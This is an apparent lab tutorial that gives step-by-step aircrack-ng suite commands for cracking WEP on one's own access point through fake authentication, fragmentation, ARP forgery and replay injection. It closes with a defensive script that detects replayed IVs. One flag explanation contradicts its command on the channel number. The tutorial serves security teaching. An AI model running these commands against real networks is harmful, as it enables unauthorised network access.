16 – WEP Fragmentation attack – NO Clients

Configure your access point as it was in the previous lesson, and refer to that lesson for more background on this attack vector, as it is explained in more detail there. The purpose of this lesson is to show that the attack also works with no clients attached to the access point.

First things first, put your card into monitor mode.

(Screenshot 1 - Enable monitor mode)

Start airodump-ng:

airodump-ng mon0 -c 6 --bssid 2C:B0:5D:XX:XX:XX -w frag

“airodump-ng” to start airodump-ng
“mon0” is to set the interface of your wireless card
“-c” is to set your channel which is currently set to 1
“--bssid” is to set the MAC address of the access point
“-w” is to write this to a capture file called frag

(Screenshot 2 - Starting airodump-ng)

The output of airodump-ng currently looks like the following, with no data packets being sent or received on the network.

(Screenshot 3 - airodump-ng output)

Next, run aireplay-ng to perform a fake authentication with the access point, using the actual physical MAC address of your card:

aireplay-ng -1 0 -e test -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-1” is for a fake authentication
“0” is the re-association timing in seconds and may need to be adjusted
“-e” is the SSID of the access point, which is test
“-a” is followed by the MAC address of the access point
“-h” is the physical MAC address of your card
“mon0” is the interface of the wireless card

(Screenshot 4 - fake authentication with the access point)

The output of airodump-ng now looks like the following, with our card associated with the access point through the fake authentication.

(Screenshot 5 - airodump-ng output after fake authentication)

Run the fragmentation attack:

aireplay-ng -5 -e test -b 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-5” specifies that you want to run the fragmentation attack
“-e” is to specify the SSID of the access point, which is test
“-b” is to set the MAC address of the access point
“-h” is your physical wireless card MAC address
“mon0” is the interface of your wireless card

(Screenshot 6 - fragmentation attack no clients)

Successful output from the fragmentation attack looks like the screenshot above. As you can see, we have obtained the keystream, which is saved in the xor file; we can now use it to create an arbitrary packet with packetforge-ng in the next step.

packetforge-ng -0 -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec.xor -w arp-request

“packetforge-ng” to start packetforge-ng
“-0” is to forge an ARP packet
“-a” is for specifying the access point MAC address
“-h” is to specify your wireless card MAC address
“-k” is for setting the destination IP and/or port, in this case the broadcast address 255.255.255.255
“-l” (a lower case ‘L’, to save confusion) is for setting the source IP and/or port, which is once again the broadcast address 255.255.255.255
“-y” is to use the xor file obtained from the fragmentation attack to forge the packet
“-w” is to write the forged packet to a file, which is called arp-request

(Screenshot 7 - packetforge-ng arp request)

Take a quick look at airodump-ng before you start, to see the data packets and make sure you are still associated with the access point. If you are not, just run the fake authentication again before you continue.

(Screenshot 8 - airodump-ng output)

Once you have your packet forged from the previous step, you can inject it into the access point by issuing aireplay-ng with the following parameters:

aireplay-ng -2 -r arp-request mon0

“aireplay-ng” will start aireplay-ng
“-2” is to run an interactive packet replay
“-r” is to select the file from which to extract packets, which is arp-request here
“mon0” is the interface of your card to run this from

(Screenshot 9 - aireplay-ng arp packet injection)

Wait a few minutes to generate enough packets before running aircrack-ng. On the Raspberry Pi 2, at least, I noticed that starting aircrack-ng too early seems to freeze the injection process, which means restarting the whole process again. After a few minutes you should see that the data count has risen greatly; the more data packets seen here, the better for the cracking process.

(Screenshot 10 - airodump-ng output data packets growing hugely)

Start aircrack-ng against the airodump-ng capture using the following:

aircrack-ng frag-01.cap

“aircrack-ng” starts aircrack-ng
“frag-01.cap” is the name of the capture file against which to run aircrack-ng

As you can see, we have obtained a huge number of IVs, so this should be quick and easy.

(Screenshot 11 - start aircrack-ng)

Aircrack-ng success looks like the following.

(Screenshot 12 - aircrack-ng success no clients)

Lesson learned:

I really find I am repeating myself now when it comes to WEP encryption, and you can probably already hear me saying it: don’t use WEP! If you know somebody using it, help them out and teach them how to secure their network. Much like the Chopchop attack carried out in the previous lesson, this attack greatly increases the speed at which you can obtain and crack the WEP key: by injecting arbitrary ARP packets forged with packetforge-ng into the access point, you increase the volume of data packets on the network, obtain more IVs and speed up the cracking process. Even when no clients are connected to the access point this attack can still be carried out and the WEP key obtained, and you would not notice anything suspicious on any of your wireless clients, as you most likely would not know this was even carried out.
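A defender-side counterpoint to that last sentence, as an added example that is not part of the original lesson: a legitimate WEP station increments its IV on every frame, whereas an ARP replay re-sends one identical frame over and over, so repetition of the same IV and frame length from one transmitter is a usable monitoring signal. The script below flags such a station; the frame records and MAC addresses are constructed sample data, not a real capture.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class WepFrame:
    ts: float     # capture time in seconds
    src: str      # transmitter MAC
    bssid: str    # access point MAC
    iv: bytes     # 3-byte WEP IV from the frame header
    length: int   # frame length in bytes


def detect_wep_replay(frames, window=10.0, threshold=50):
    """Return {src_mac: repeat_count} for stations that re-send the exact same
    (IV, length) more than `threshold` times inside any `window`-second span.
    A normal WEP client uses a fresh IV per frame, so heavy repetition of one
    IV from one station indicates packet replay or injection, not real traffic."""
    by_key = defaultdict(list)
    for f in frames:
        by_key[(f.src, f.bssid, f.iv, f.length)].append(f.ts)
    alerts = {}
    for (src, _bssid, _iv, _len), times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count > threshold:
                alerts[src] = max(alerts.get(src, 0), count)
    return alerts


def constructed_capture():
    """Constructed sample: one normal client and one station replaying a frame."""
    ap = "2C:B0:5D:00:00:01"                    # placeholder access point MAC
    frames = []
    for i in range(300):                        # normal client: fresh IV each frame
        frames.append(WepFrame(i * 0.1, "AA:BB:CC:00:00:01", ap, i.to_bytes(3, "big"), 98))
    for i in range(300):                        # injector: same frame every 10 ms
        frames.append(WepFrame(i * 0.01, "00:C0:CA:00:00:01", ap, b"\x12\x34\x56", 68))
    return frames


if __name__ == "__main__":
    print(detect_wep_replay(constructed_capture()))  # {'00:C0:CA:00:00:01': 300}
```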